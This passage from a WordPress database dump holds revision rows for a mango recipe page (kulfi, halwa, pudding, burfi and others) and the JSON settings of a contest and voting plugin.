Chop them to cubes and add to a blender jar.<br>Add chilled cream, saffron, condensed milk and cardamom powder to the jar.<br>Blend on a medium speed until smooth.<br>Add chopped pistas. Give a good stir.<br>Pour the mixture to the kulfi moulds and refrigerate until set.<br>Rub the moulds in between your palm or dip them in a bowl of water.<br>Gently loosen and remove mango kulfi.<br>Garnish with crushed pista. Serve with love.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-halwa-recipe\"><strong>MANGO HALWA RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time :15 Mins<br>Cook Time :45 Mints<br>Makes :4-5 Perfect Squares &amp; Some Small Pieces</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-2\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>2 and 3/4 cups Mango Pulp<br>1 tablespoon Ghee</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions-1\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>In a heavy bottom vessel add the ghee and when it is hot add the mango pulp.<br>Keep stirring the mixture every 10-15 minutes so that it does not stick to the vessel.<br>The mixture will reduce in quantity, there will be a change in color and after 45 minutes transfer this mixture to a greased (with very little ghee) plate. I used 2 and 3/4 cups of pulp and it cooked down to 3/4ths of a cup approximately. So a very small plate is enough.<br>Left the plate undisturbed for one more hour and then cut it into pieces.<br>Garnish it with nuts of your choice.</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:group -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->','Mango Recipes','','inherit','closed','closed','','745-revision-v1','','','2022-02-07 17:28:06','2022-02-07 11:58:06','',745,'https://mangomitra.in/?p=826',0,'revision','',0),(828,1,'2022-02-07 17:28:43','2022-02-07 11:58:43','','252-2529007_pudding-jelly-hd-png-download-1','','inherit','open','closed','','252-2529007_pudding-jelly-hd-png-download-1','','','2022-02-07 17:28:43','2022-02-07 11:58:43','',745,'https://mangomitra.in/wp-content/uploads/2022/02/252-2529007_pudding-jelly-hd-png-download-1.png',0,'attachment','image/png',0),(829,1,'2022-02-07 17:30:40','2022-02-07 12:00:40','<!-- wp:group -->\n<div class=\"wp-block-group\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:heading -->\n<h2 id=\"mango-pudding-recipe\"><strong>MANGO PUDDING RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"id\":828,\"width\":236,\"height\":133,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/252-2529007_pudding-jelly-hd-png-download-1.png\" alt=\"\" class=\"wp-image-828\" width=\"236\" height=\"133\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time : 4 hours<br>Cook Time :15 minutes<br>Total Time : 4 hours 15 minutes<br>Servings : 3 Servings</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>1 tsp agar-agar / gelatin / china grass<br>2 tsp hot water<br>2 cups mango puree<br>for cream layer:<br>1 cup milk full cream<br>1 tsp agar-agar / gelatin<br>½ cup sugar powdered<br>1 cup cream<br>1 tsp vanilla extract / vanilla essence<br>pinch of salt</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Firstly, in a large mixing bowl take 1 tablespoon of agar-agar / gelatin and add 2 tablespoon hot water.   Mix well and dissolve agar-agar completely.<br>Further add 2 cups of mango puree. Mix well making sure the pulp gets mixed up with agar-agar uniformly.<br>Furthermore, place the serving glass in a bowl so that it gets tilted slightly. Pour in prepared mango mixture till it reaches the rim.<br>Now refrigerate it for 2 hours or overnight, till it sets completely. After 2 hours, make sure to check the mango has set completely.<br>Now prepare cream layer by heating up milk.<br>Add in 1 tablespoon agar-agar / gelatin and whisk well.<br>Cook the milk on medium-low heat till it steams (do not boil).<br>Further add 1 cup cream and whisk well. Additionally add ½ cup powdered sugar, 1 tablespoon vanilla extract and pinch of salt. Whisk and dissolve the sugar completely.<br>Let the milk cool for 10 minutes before pouring to the glass.<br>Pour the milk into glass.<br>Refrigerate it for 2 hours or overnight, till it sets completely.<br>Finally, garnish with few chopped mangoes and enjoy mango panna cotta or mango pudding.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:heading -->\n<h2 id=\"mavinakayi-chitranna-recipe\"><strong>MAVINAKAYI CHITRANNA RECIPE </strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph {\"align\":\"left\"} -->\n<p class=\"has-text-align-left\">Mavinakayi Chitranna Recipe is a delicious preparation of rice from the raw green mangoes that you get in the summers. The tartness of the mangoes along with the green chillies and the seasonings, brings out the flavors of this classic South Indian Rice recipe. While you’re probably enjoying the beautifully luscious ripe mangoes of the season, don’t forget to enjoy your share of the raw mangoes too by trying this Mavinakayi Chitranna Recipe. Summer feels incomplete without getting enough of the tangy hit of raw mangoes, balanced by hot spices,salt, lime and the right tempering, raw mangoes are delicious in a range of preparations.Serve the Mavinakayi Chitranna along with a Tomato Onion Cucumber Raita or High-Protein Peanut Chutney and a roasted papad for lunch or even for dinner. The Mavinakayi Chitranna makes a great picnic lunch too.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-rasayana\"><strong>MANGO RASAYANA</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p id=\"mango-rasayana\">Cut the mangoes into small cubes and keep them in a mixing bowl.<br>Squeeze and extract the remaining mango juice from the mangoes.<br>Next add coconut milk, jaggery, and cardamom powder. Mix well. Adjust the consistency of rasayana.<br>Serve chilled with dosa, poori, or chapati.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-seekarna\"><strong>MANGO SEEKARNA</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Seekarane with Holige, Poori, Dosa, chapati, or also can be eaten as it is.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Variations<br>Any variety of mangoes can be used, but try to choose sweet, juicy, and pulpy mangoes.<br>You can use white or brown sugar instead of jaggery. Adjust the jaggery based on the sweetness of the mango. I have made coconut milk at home using freshly shredded coconut but you can also use store brought coconut milk. You can also replace coconut milk with dairy milk or almond milk.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-burfi-recipe\"><strong>MANGO BURFI RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time : 5 minutes<br>Cook Time : 15 minutes<br>Total Time : 20 minutes<br>Servings : 24 pieces</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-1\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>1 cup mango cubes<br>½ cup milk<br>1 cup sugar<br>3 cup coconut grated<br>¼ tablespoon cardamom powder</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructons\"><strong>INSTRUCTONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Firstly, in a blender take 1 cup mango and ½ cup milk.<br>Blend to smooth puree adding more milk if required.<br>Transfer the mango puree to large kadai.<br>Also add 1 cup sugar and mix until sugar dissolves completley.<br>Further add 3 cup coconut keep stirring till the mixture starts to thicken continue to cook on medium flame stirring continuously and after 15 minutes, coconut mixture will start to separate from pan.<br>Now add ¼ tablespoon cardamom powder and mix well.<br>Transfer the prepared mixture into a greased plate lined with baking paper set well forming a block and cut into pieces.<br>Finally, serve mango burfi / mango coconut barfi or store in airtight container for a week in the refrigerator.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-kulfi-recipe\"><strong>MANGO KULFI RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p id=\"mango-kulfi-recipe\">Indian mango kulfi is a instant dessert that is made with condensed milk, mango pulp and cream.<br>For best results follow my detailed step-by-step photo instructions and tips.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-2\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>1 ½ cup mango pieces, cubed (use sweet mango)(1 medium)<br>½ tin sweetened condensed milk(milkmaid)<br>200 ml whipping cream or 250 ml cream(chilled)<br>1/4 tablespoon elaichi (cardamom powder)<br>1 pinch kesar (saffron) (optional for color)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions-1\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Soak kesar or saffron in 2 tablespoon hot water. This is optional.<br>Wash and peel mango. Chop them to cubes and add to a blender jar.<br>Add chilled cream, saffron, condensed milk and cardamom powder to the jar.<br>Blend on a medium speed until smooth.<br>Add chopped pistas. Give a good stir.<br>Pour the mixture to the kulfi moulds and refrigerate until set.<br>Rub the moulds in between your palm or dip them in a bowl of water.<br>Gently loosen and remove mango kulfi.<br>Garnish with crushed pista. Serve with love.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-halwa-recipe\"><strong>MANGO HALWA RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time :15 Mins<br>Cook Time :45 Mints<br>Makes :4-5 Perfect Squares &amp; Some Small Pieces</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-2\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>2 and 3/4 cups Mango Pulp<br>1 tablespoon Ghee</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions-1\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>In a heavy bottom vessel add the ghee and when it is hot add the mango pulp.<br>Keep stirring the mixture every 10-15 minutes so that it does not stick to the vessel.<br>The mixture will reduce in quantity, there will be a change in color and after 45 minutes transfer this mixture to a greased (with very little ghee) plate. I used 2 and 3/4 cups of pulp and it cooked down to 3/4ths of a cup approximately. So a very small plate is enough.<br>Left the plate undisturbed for one more hour and then cut it into pieces.<br>Garnish it with nuts of your choice.</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:group -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->','Mango Recipes','','inherit','closed','closed','','745-revision-v1','','','2022-02-07 17:30:40','2022-02-07 12:00:40','',745,'https://mangomitra.in/?p=829',0,'revision','',0),(845,1,'2022-02-08 13:04:59','2022-02-08 07:34:59','{\"id\":\"787\",\"contest\":{\"form\":{\"fields\":[{\"uid\":\"96a6af3c-99c5-4bf7-a0c6-39c364363be7\",\"type\":\"text\",\"name\":\"field\",\"label\":\"name\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":{\"filter\":{\"rules\":[]}},\"attributes\":[],\"template\":\"\"},{\"uid\":\"2fdee483-91bf-4618-a7a6-cf4615416004\",\"type\":\"number\",\"name\":\"field_copy\",\"label\":\"Field\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":[],\"attributes\":[],\"template\":\"\"},{\"uid\":\"aad5c7ba-ec2b-4bc7-996f-66fdaa85eeb2\",\"type\":\"image\",\"name\":\"field_copy_copy\",\"label\":\"insert image\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":false,\"validations\":[],\"attributes\":[],\"template\":\"\"}]},\"submissions\":{\"requiresApproval\":false,\"title\":\"Submission {{id}}\",\"subtitle\":\"{{votes}} Votes | {{views}} Views\",\"content\":\"\",\"preview\":{\"source\":\"\",\"default\":\"\"},\"perPage\":9,\"blocks\":{\"enabled\":true}},\"limitations\":{\"quota\":{\"value\":0},\"period\":{\"start\":\"\",\"end\":\"\"}},\"frequency\":{\"cookies\":{\"enabled\":true},\"ip\":{\"enabled\":false},\"user\":{\"enabled\":false},\"count\":1,\"timeout\":3600}},\"menu\":{\"items\":[{\"id\":\"home\",\"label\":\"\"},{\"id\":\"participate\",\"label\":\"\"},{\"id\":\"submissions\",\"label\":\"\"},{\"id\":\"pages\",\"label\":\"\"}],\"default\":\"participate\"},\"pages\":{\"landing\":{\"title\":\"\",\"content\":\"\"},\"participate\":{\"title\":\"\",\"content\":\"\"},\"submissions\":{\"title\":\"\",\"content\":\"\"},\"thankyou\":{\"voting\":{\"content\":\"Your vote has been casted. Thank you!\"},\"submission\":{\"content\":\"Thank you for participating in this contest!\"}},\"default\":\"participate\",\"other\":[]},\"design\":{\"template\":\"basic-template\",\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"none\"},\"colors\":{\"primary\":\"#1e73be\",\"primaryContrast\":\"#ffffff\",\"primaryDark\":\"#07457c\",\"secondary\":\"#81d742\",\"secondaryContrast\":\"#ffffff\",\"secondaryDark\":\"#489b0d\",\"accent\":\"#dd9933\",\"accentContrast\":\"#ffffff\",\"accentDark\":\"#925802\",\"dark\":\"#333333\",\"white\":\"#ffffff\",\"gray\":\"#dddddd\",\"grayDark\":\"#aaaaaa\",\"grayLight\":\"#eeeeee\",\"grayLighter\":\"#fafafa\"},\"custom\":{\"container\":{\"colors\":{\"background\":\"#ffffff\",\"border\":\"\",\"color\":\"\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"toolbar\":{\"colors\":{\"background\":\"#ffffff\",\"border\":\"#dddddd\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0.5em\",\"bottom\":\"0.5em\",\"left\":\"0.5em\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"menu\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"},\"colors\":{\"background\":\"\",\"color\":\"\",\"border\":\"\",\"backgroundHover\":\"\",\"colorHover\":\"\",\"colorActive\":\"\",\"backgroundActive\":\"\",\"borderActive\":\"\"}},\"message\":{\"colors\":{\"background\":\"#ecf0f1\",\"color\":\"#333333\",\"border\":\"#ecf0f1\",\"backgroundError\":\"#c0392b\",\"colorError\":\"#ffffff\",\"borderError\":\"#c0392b\"},\"border\":{\"width\":\"0\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"button\":{\"colors\":{\"background\":\"\",\"color\":\"\",\"border\":\"\",\"backgroundHover\":\"\",\"colorHover\":\"\",\"borderHover\":\"\",\"backgroundPrimary\":\"\",\"colorPrimary\":\"\",\"borderPrimary\":\"\",\"backgroundPrimaryHover\":\"\",\"colorPrimaryHover\":\"\",\"borderPrimaryHover\":\"\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"1\",\"align\":\"center\",\"transform\":\"inherit\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"left\":\"1em\",\"bottom\":\"1em\"},\"shadows\":{\"box\":\"inset 0 1px 0 rgba(255, 255, 255, 0.15), 0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"contentPage\":{\"colors\":{\"color\":\"#333333\",\"background\":\"#ffffff\",\"border\":\"#dddddd\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"form\":{\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"padding\":{\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\"},\"colors\":{\"background\":\"inherit\",\"color\":\"#333333\"},\"label\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0.5em\",\"left\":\"0\"},\"colors\":{\"color\":\"inherit\"}},\"input\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0.5em\",\"bottom\":\"0.5em\",\"left\":\"0.5em\"},\"colors\":{\"color\":\"\",\"background\":\"#ffffff\",\"border\":\"\",\"colorHover\":\"\",\"backgroundHover\":\"#ffffff\",\"borderHover\":\"\",\"colorActive\":\"\",\"backgroundActive\":\"\",\"borderActive\":\"\"},\"shadows\":{\"box\":\"inset 0 3px 0 rgba(0, 0, 0, 0.05)\"}},\"file\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"border\":{\"width\":\"2px\",\"style\":\"dashed\",\"radius\":\"4px\"},\"padding\":{\"top\":\"3em\",\"right\":\"3em\",\"bottom\":\"3em\",\"left\":\"3em\"},\"colors\":{\"color\":\"inherit\",\"background\":\"inherit\",\"border\":\"#bbbbbb\"}},\"error\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\"},\"colors\":{\"background\":\"transparent\",\"color\":\"#f44336\"}}},\"submission\":{\"colors\":{\"background\":\"#ffffff\",\"color\":\"inherit\",\"border\":\"#dddddd\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"lineHeight\":\"inherit\",\"fontSize\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}}},\"layout\":{\"type\":\"grid\",\"maxWidth\":\"100%\",\"columns\":3,\"gutter\":\"1rem\"},\"behaviours\":{\"ajax\":true,\"scrollUp\":true},\"effects\":{\"transition\":\"fade\",\"duration\":\"500\"},\"css\":\"\"},\"share\":{\"websites\":null},\"vote\":{\"type\":\"count\",\"scale\":5,\"limitations\":{\"quota\":{\"value\":0},\"period\":{\"start\":\"\",\"end\":\"\"}},\"frequency\":{\"cookies\":{\"enabled\":true},\"ip\":{\"enabled\":false},\"user\":{\"enabled\":false},\"count\":1,\"perItem\":1,\"perCategory\":0,\"timeout\":3600},\"criteria\":[{\"name\":\"Rating\"}]},\"notifications\":{\"email\":{\"recipient\":\"wp@dxpsites.com\"},\"submission\":{\"new\":true}},\"meta\":{\"schema\":\"1.1\"},\"presetUid\":\"86ba124f0b0799b8e65b9f74726d295b\"}','A','','inherit','closed','closed','','787-revision-v1','','','2022-02-08 13:04:59','2022-02-08 07:34:59','',787,'https://mangomitra.in/?p=845',0,'revision','',0),(846,1,'2022-02-08 13:14:11','2022-02-08 07:44:11','{\"id\":\"787\",\"contest\":{\"form\":{\"fields\":[{\"uid\":\"96a6af3c-99c5-4bf7-a0c6-39c364363be7\",\"type\":\"text\",\"name\":\"field\",\"label\":\"name\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":{\"filter\":{\"rules\":[]}},\"attributes\":[],\"template\":\"\"},{\"uid\":\"2fdee483-91bf-4618-a7a6-cf4615416004\",\"type\":\"number\",\"name\":\"field_copy\",\"label\":\"Field\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":[],\"attributes\":[],\"template\":\"\"},{\"uid\":\"aad5c7ba-ec2b-4bc7-996f-66fdaa85eeb2\",\"type\":\"image\",\"name\":\"field_copy_copy\",\"label\":\"insert image\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":[],\"attributes\":[],\"template\":\"\"}]},\"submissions\":{\"requiresApproval\":false,\"title\":\"Submission {{id}}\",\"subtitle\":\"{{votes}} Votes | {{views}} Views\",\"content\":\"\",\"preview\":{\"source\":\"\",\"default\":\"\"},\"perPage\":9,\"blocks\":{\"enabled\":true}},\"limitations\":{\"quota\":{\"value\":0},\"period\":{\"start\":\"\",\"end\":\"\"}},\"frequency\":{\"cookies\":{\"enabled\":true},\"ip\":{\"enabled\":false},\"user\":{\"enabled\":false},\"count\":1,\"timeout\":3600}},\"menu\":{\"items\":[{\"id\":\"home\",\"label\":\"\"},{\"id\":\"participate\",\"label\":\"\"},{\"id\":\"submissions\",\"label\":\"\"},{\"id\":\"pages\",\"label\":\"\"}],\"default\":\"participate\"},\"pages\":{\"landing\":{\"title\":\"\",\"content\":\"\"},\"participate\":{\"title\":\"\",\"content\":\"\"},\"submissions\":{\"title\":\"\",\"content\":\"\"},\"thankyou\":{\"voting\":{\"content\":\"Your vote has been casted. Thank you!\"},\"submission\":{\"content\":\"Thank you for participating in this contest!\"}},\"default\":\"participate\",\"other\":[]},\"design\":{\"template\":\"basic-template\",\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"none\"},\"colors\":{\"primary\":\"#1e73be\",\"primaryContrast\":\"#ffffff\",\"primaryDark\":\"#07457c\",\"secondary\":\"#81d742\",\"secondaryContrast\":\"#ffffff\",\"secondaryDark\":\"#489b0d\",\"accent\":\"#dd9933\",\"accentContrast\":\"#ffffff\",\"accentDark\":\"#925802\",\"dark\":\"#333333\",\"white\":\"#ffffff\",\"gray\":\"#dddddd\",\"grayDark\":\"#aaaaaa\",\"grayLight\":\"#eeeeee\",\"grayLighter\":\"#fafafa\"},\"custom\":{\"container\":{\"colors\":{\"background\":\"#ffffff\",\"border\":\"\",\"color\":\"\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"toolbar\":{\"colors\":{\"background\":\"#ffffff\",\"border\":\"#dddddd\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0.5em\",\"bottom\":\"0.5em\",\"left\":\"0.5em\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"menu\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"},\"colors\":{\"background\":\"\",\"color\":\"\",\"border\":\"\",\"backgroundHover\":\"\",\"colorHover\":\"\",\"colorActive\":\"\",\"backgroundActive\":\"\",\"borderActive\":\"\"}},\"message\":{\"colors\":{\"background\":\"#ecf0f1\",\"color\":\"#333333\",\"border\":\"#ecf0f1\",\"backgroundError\":\"#c0392b\",\"colorError\":\"#ffffff\",\"borderError\":\"#c0392b\"},\"border\":{\"width\":\"0\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"button\":{\"colors\":{\"background\":\"\",\"color\":\"\",\"border\":\"\",\"backgroundHover\":\"\",\"colorHover\":\"\",\"borderHover\":\"\",\"backgroundPrimary\":\"\",\"colorPrimary\":\"\",\"borderPrimary\":\"\",\"backgroundPrimaryHover\":\"\",\"colorPrimaryHover\":\"\",\"borderPrimaryHover\":\"\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"1\",\"align\":\"center\",\"transform\":\"inherit\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"left\":\"1em\",\"bottom\":\"1em\"},\"shadows\":{\"box\":\"inset 0 1px 0 rgba(255, 255, 255, 0.15), 0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"contentPage\":{\"colors\":{\"color\":\"#333333\",\"background\":\"#ffffff\",\"border\":\"#dddddd\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 